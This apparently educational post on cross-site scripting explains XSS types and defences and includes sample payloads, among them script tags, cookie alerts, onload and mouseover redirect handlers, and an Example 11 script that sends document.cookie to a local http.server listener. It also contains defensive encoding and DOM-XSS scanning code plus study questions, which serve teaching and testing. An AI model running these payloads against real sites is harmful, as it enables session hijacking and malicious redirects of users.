Cross-Site Scripting (XSS)


Introduction

Cross-site scripting (XSS) attacks inject malicious scripts into otherwise trusted websites by exploiting web applications that do not validate or encode user input before placing it in a page. The injected script, usually browser-side JavaScript, runs in the victim's browser with the privileges of the vulnerable site's origin, so it can read data such as cookies or session tokens and act on the victim's behalf.


Types of XSS

  1. Reflected XSS: The injected script is reflected off the web server, typically in error messages or search results, and reaches the victim through a crafted link, form, or a third-party site. Also known as Non-Persistent or Type-I XSS.
  2. Stored XSS: The injected script is permanently stored on the target server, for example in a database or message forum, and is served to every victim who requests the stored content. Also known as Persistent or Type-II XSS.
  3. DOM-based XSS: The flaw is in client-side JavaScript that takes attacker-controlled data (for example from location.hash or location.search) and writes it into the page through a sink such as innerHTML or document.write. The payload may never reach the server, so server-side filtering does not see it. Discussed separately due to its distinct nature.
  4. Blind Cross-site Scripting: A stored XSS in which the payload is saved by the application and later rendered in a back-end or administrative interface the attacker cannot see, such as a support ticket queue or a log viewer. Because there is no visible reflection, detection tools like XSS Hunter, which call back to the tester when the payload executes, are used to confirm it.


Non-Persistent or Type-I XSS or Reflected XSS

  • It refers to an XSS attack where the injected script is reflected off the web server.
  • It occurs in a single request/response cycle.
  • The injected code is included in the dynamic content the web server sends back to the user as part of the response.
  • Reflected XSS attacks are often delivered through malicious links, specially crafted forms, or directing users to a compromised website.
  • The victim interacts with the malicious content, and the injected script is reflected to the user's browser, which executes the code as it appears to come from a "trusted" server.


Type-II XSS or Stored XSS

  • The attacker injects a malicious script that is permanently stored on the target server.
  • The injected code is typically saved in a database, message forum, visitor log, comment field, or similar storage locations.
  • The victim retrieves the malicious script when requesting the stored information from the server.
  • The injected code in Stored XSS persists over time, allowing an attacker to impact users who access the compromised data at a later point.
  • This type of XSS can be more damaging as it has a prolonged effect and can affect multiple users over time.


XSS Attack Consequences

  • Severity ranges from annoyance to complete account compromise.
  • Can disclose session cookies, leading to session hijacking.
  • Other consequences include file disclosure, Trojan horse installations, redirects, and content modification.


How to Identify Vulnerabilities

  • Perform a security review of the code, tracing every place where untrusted input (request parameters, headers, stored records) reaches HTML output, and check that it is encoded for the context it lands in (text node, attribute value, script, URL).
  • Scanners such as Nessus and Nikto can assist, but they mostly cover known server-level issues; XSS in application-specific code is usually found by code review or by a web application scanner or proxy that fuzzes reflection points.


XSS attacks occur when:

  • Data from an untrusted source enters a web application, often through web requests.
  • Unvalidated data is included in dynamic content sent to the user's browser.


Malicious content, usually JavaScript, is injected and enables the attacker to:

  • Steal sensitive information like cookies or session tokens.
  • Redirect victims to controlled content.
  • Modify HTML content.
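The two conditions above, untrusted request data entering the application and being copied unencoded into the response, are easiest to see side by side. The following is an added example, not code from the original article: a minimal search page rendered once with the defect and once hardened with context-aware output encoding. It uses the article's reflected payload (Example 2) and an attribute-breakout payload in the style of Example 6; the host name, page layout and function names are made up for the demo.

```javascript
// Added example (not from the original article): reflected XSS defect vs. its fix.
// Untrusted data enters via the query string and is rendered into HTML.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Output encoding for HTML text nodes and double-quoted attribute values.
// Encoding the quotes is what stops the Example 6 style attribute breakout.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Step 1: untrusted data enters the application (here: two query parameters).
// `q` will land in a text node, `logo` in an attribute value.
function parseSearchRequest(requestUrl) {
  const url = new URL(requestUrl);
  return {
    q: url.searchParams.get("q") ?? "",
    logo: url.searchParams.get("logo") ?? "logo",
  };
}

// Step 2 (vulnerable): raw values concatenated straight into the markup.
function renderVulnerable({ q, logo }) {
  return `<h1>Results for ${q}</h1>\n<img src="/static/logo.png" alt="${logo}">`;
}

// Step 2 (hardened): every untrusted value is encoded for the HTML context it lands in.
function renderHardened({ q, logo }) {
  return `<h1>Results for ${escapeHtml(q)}</h1>\n<img src="/static/logo.png" alt="${escapeHtml(logo)}">`;
}

// The article's Example 2 payload, and an attribute-breakout payload: the leading
// quote closes alt="" early so `onload=` is parsed as a new attribute.
const REFLECTED_PAYLOAD = "<script>alert('XSS')</script>";
const ATTRIBUTE_PAYLOAD = "\" onload=\"alert('XSS')";

// Constructed attacker link (hypothetical host) carrying both payloads.
function demoUrl() {
  const u = new URL("https://app.example.test/search");
  u.searchParams.set("q", REFLECTED_PAYLOAD);
  u.searchParams.set("logo", ATTRIBUTE_PAYLOAD);
  return u.toString();
}

// Renders the same request both ways so the difference is visible.
function runDemo() {
  const params = parseSearchRequest(demoUrl());
  return { vulnerable: renderVulnerable(params), hardened: renderHardened(params) };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

In the vulnerable output the browser sees a real `<script>` element and an `<img>` with an `onload` handler; in the hardened output the same bytes are inert text inside the `<h1>` and inside the quoted `alt` value. Note that encoding is context-specific: this function is correct for text nodes and quoted attributes, but a value placed inside a `<script>` block, an unquoted attribute, or a URL needs a different encoder.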


How to Perform the XSS Attack


Overview

  • Purpose: Test for XSS vulnerabilities.
  • Scope: Basic payloads with explanations.


Targets for Practice

  • Any intentionally vulnerable test site
  • Explicit permission is required for testing.
  • Educational purposes only.


Example 1 – Injecting Tags

Enter <plaintext> in the search field.

If the page echoes the input without encoding, the browser treats everything after the tag as literal text and the rest of the page's HTML source is displayed. No script runs, but it proves that the input is reflected into the markup unencoded, which is the precondition for the payloads that follow.

Example 2 – Reflected XSS

<script>alert('XSS')</script>

Example 3 - Display the Cookies

<script>alert(document.cookie);</script>

The alert shows only the cookies that script on the vulnerable page's origin is allowed to read: cookies for other origins are out of reach because of the same-origin policy, and cookies set with the HttpOnly flag are not exposed through document.cookie at all. Handle any cookie data obtained during testing with care and respect the privacy of the users involved.


Example 4 – HTML Comment Tag XSS stored

Enter "<!---" in the Message field.

An unclosed HTML comment swallows everything that follows it until the next "-->", so the rest of the page (including other users' messages) disappears from the rendered view. Like Example 1, this is HTML injection that confirms stored input is rendered unencoded.

Example 5 – Stored XSS via HTML Injection

<a >Hey, check out my site!</a>

The href attribute has been stripped from this line; the payload only makes sense with one pointing at an attacker-controlled page. A stored link that other users will click is HTML injection rather than script execution, but it is a common phishing vector.

Example 6 – Concealing Script in Image Alt Attribute

<img src="insert the image address" alt=""onload="javascript:alert('XSS')">

The quote after alt= closes the attribute early, so onload= is parsed as a new attribute and the handler fires once the image loads. The javascript: prefix is unnecessary inside an event handler (JavaScript parses it as a label) and can be dropped. The defence is to encode quotes, not just angle brackets, when untrusted data is placed in an attribute value.

Example 7 – Automatic Redirect XSS stored

<script>window.location='https://www.google.com'</script>

Example 8 – Redirect on Mouseover (Broken Image) XSS stored

<img src=x onMouseOver=window.location='https://www.google.com'>
<img src="https://www.deepeddy.net/img/deepeddyfish.gif " alt=""<body onload="alert(String.fromCharCode (88,83,83))">
<img src="https://www.deepeddy.net/img/deepeddyfish.gif" alt=""onload="alert('XSS')">
<img src="https://www.deepeddy.net/img/deepeddyfish.gif" onMouseOver=window.location='https://www.google.com'>

Hover over the broken image to trigger the redirect.


Example 9 – Redirect on Mouseover (Empty Space) XSS stored

  • The script is used to create a space and redirect on mouseover.
  • Hover over the seemingly empty message area to trigger the redirect.

<p id="demo" onmouseover="myFunction()"> &nbsp; </p>
<script>
function myFunction() {
  document.getElementById("demo").innerHTML = "<img src=&nbsp; onMouseOver=window.location='https://www.google.com'>";
}
</script>

Example 10 – DOM-based Attack XSS (stored)

<button onclick="alert('xss')"> submit </button>

This payload is stored markup with an inline event handler, so it is a stored XSS rather than a DOM-based one. A genuine DOM-based XSS needs no server involvement: client-side script reads attacker-controlled data (for example from location.hash) and writes it into the page through a sink such as innerHTML or document.write.
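Because DOM-based XSS lives in client-side code, finding it means tracing DOM sources to HTML or script sinks in the page's JavaScript. The following is an added example, not code from the original article: a small regex-based source-to-sink review aid that flags lines where data from a DOM source, or a variable derived from one, reaches such a sink. The sample page script it scans is constructed for the demo, and the source and sink lists are a minimal set chosen here, not an exhaustive catalogue. A real code review or SAST tool handles the cases this crude scanner misses (aliasing through function calls, flows across files, taint inside nested expressions).

```javascript
// Added example (not from the original article): a tiny source-to-sink scanner
// for DOM-based XSS candidates in client-side JavaScript.

// DOM sources an attacker can control via the URL or window name.
const DOM_SOURCES = [
  "location.hash", "location.search", "location.href",
  "document.URL", "document.referrer", "window.name",
];

// Sinks that interpret a string as HTML or code.
const DOM_SINKS = [
  ".innerHTML", ".outerHTML", ".insertAdjacentHTML(",
  "document.write(", "document.writeln(", "eval(",
];

// Matches `const x = ...`, `let x = ...`, `var x = ...` or a bare `x = ...` (not `==`).
const ASSIGNMENT = /^\s*(?:(?:const|let|var)\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)/;

function firstMatch(text, needles) {
  return needles.find((n) => text.includes(n)) || null;
}

// Whole-identifier match that ignores property accesses such as `window.name`.
function mentionsIdentifier(text, id) {
  const escaped = id.replace(/\$/g, "\\$");
  return new RegExp(`(?<![\\w$.])${escaped}(?![\\w$])`).test(text);
}

// Single forward pass: report sink lines fed by a source or a tainted variable,
// then propagate taint from assignments whose right-hand side is tainted.
function scanForDomXss(source) {
  const tainted = new Set();
  const findings = [];
  source.split("\n").forEach((rawLine, idx) => {
    const code = rawLine.split("//")[0]; // drop trailing comments (crude; breaks on URLs)
    const sink = firstMatch(code, DOM_SINKS);
    if (sink) {
      const direct = firstMatch(code, DOM_SOURCES);
      const viaVar = [...tainted].find((id) => mentionsIdentifier(code, id));
      if (direct || viaVar) {
        findings.push({
          line: idx + 1,
          sink: sink.replace(/^\.|\($/g, ""),
          source: direct || `tainted variable '${viaVar}'`,
          text: rawLine.trim(),
        });
      }
    }
    const m = ASSIGNMENT.exec(code);
    if (m) {
      const rhs = code.slice(code.indexOf("=") + 1);
      const fromSource = firstMatch(rhs, DOM_SOURCES) !== null;
      const fromTainted = [...tainted].some((id) => mentionsIdentifier(rhs, id));
      if (fromSource || fromTainted) tainted.add(m[1]);
    }
  });
  return findings;
}

function formatFindings(findings) {
  return findings.map((f) => `line ${f.line}: ${f.source} -> ${f.sink}   ${f.text}`);
}

// Constructed sample page script: lines 3, 5 and 8 are the DOM-XSS candidates;
// line 4 uses textContent, which is the safe sink for untrusted text.
const SAMPLE_CLIENT_JS = [
  "const params = new URLSearchParams(location.search);",
  "const name = params.get('name');",
  "document.getElementById('greet').innerHTML = 'Hello ' + name;",
  "document.getElementById('greet2').textContent = name;",
  "document.write(decodeURIComponent(location.hash.slice(1)));",
  "const title = 'Dashboard';",
  "document.title = title;",
  "eval(window.name);",
].join("\n");

console.log(formatFindings(scanForDomXss(SAMPLE_CLIENT_JS)).join("\n"));
```

The flagged line 3 is the classic case: the query parameter never touches the server's HTML, so server-side encoding does nothing, and the fix is in the client (assign to textContent, or encode before innerHTML). Line 5 shows a direct source-to-sink flow, and line 8 shows a code sink, where the remedy is not to evaluate attacker-reachable strings at all.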

Example 11 – Capture the Victim Activity on the Attacker Server

Start a listener on the attacker's machine (shown here on the loopback address, so attacker and victim are the same host):
python3 -m http.server 1337
Inject the script (stored or reflected):
<script>window.location = 'http://127.0.0.1:1337/?cookie=' + document.cookie</script>

http.server speaks plain HTTP, so the URL must use http://, not https://. When the script runs, the victim's browser navigates to the listener and the non-HttpOnly cookies of the vulnerable origin arrive in the query string, where they show up in the http.server request log. Because window.location visibly sends the victim away from the page, a real attacker would more often use a background request (an image load or fetch) to the same URL.

Special Questions

What is the purpose of running python3 -m http.server 1337 in this scenario?
Explain the role of window.location in the provided script.
How does document.cookie retrieve the user's cookie information?
What does the URL http://127.0.0.1:1337/?cookie= represent in this context?
What happens when the script is executed on a webpage?
Why is it crucial for the attacker to open an HTTP server before running the script?
How could a user protect themselves from such attacks?
What potential risks does this script pose to user privacy and security?
In what ways can a web developer safeguard against such script-based attacks?
Explain the significance of the query parameter ?cookie= in the URL.
How does the <plaintext> tag expose a vulnerability, and what security best practices should be implemented to prevent such issues?
Differentiate between reflected and stored XSS, providing real-world examples for each type from the scenarios.
Why is concealing a script within an image's alt attribute a security concern, and what measures can be taken to defend against such attacks?
Explain the technique employed to redirect mouseover with seeming space and discuss potential countermeasures to mitigate this attack.
Elaborate on DOM-based attacks and compare them with the other XSS attack vectors.
How can security headers, such as Content Security Policy (CSP), be utilized to enhance web application security and mitigate XSS vulnerabilities?
Could you talk about the importance of input validation in preventing XSS attacks and provide examples of input validation techniques?
What role does client-side security play in preventing XSS, and how can JavaScript frameworks contribute to mitigating such vulnerabilities?
Could you explain the significance of the same-origin policy in the context of XSS attacks and how it helps prevent unauthorized data access?
Describe the role of browser extensions and plugins in XSS prevention and discuss potential risks associated with them.
Discuss the impact of XSS attacks on user privacy and data integrity, using examples from real-world incidents.
Evaluate the effectiveness of input validation mechanisms in preventing XSS attacks, considering scenarios where user input is dynamic and unpredictable.
How can the use of HTTP-only cookies contribute to the mitigation of XSS attacks, and what are the limitations of this approach?
Could you look into the impact of browser sandboxing on the prevention of XSS attacks and discuss any potential drawbacks or limitations?
In the context of XSS, discuss the challenges and considerations associated with securing legacy web applications.
Explore the potential risks associated with third-party content injection and the steps web developers can take to mitigate such risks.
Discuss the role of input validation in preventing DOM-based XSS attacks and provide examples of situations where traditional input validation may fall short.




Maskottchen Technology

Embedded Software Development at Maskottchen

1 year

Promoting security awareness is crucial in today's digital landscape. Kudos to spreading knowledge and empowering others to stay safe online!

Jatin Parashar

Upcoming GRC Associate @RSM | Cyber Security Professional | Web3 Explorer | Content Creator

1 year

Informational post, Keshav Sinha Sir ji. Thanks for sharing the information, Sir ji.
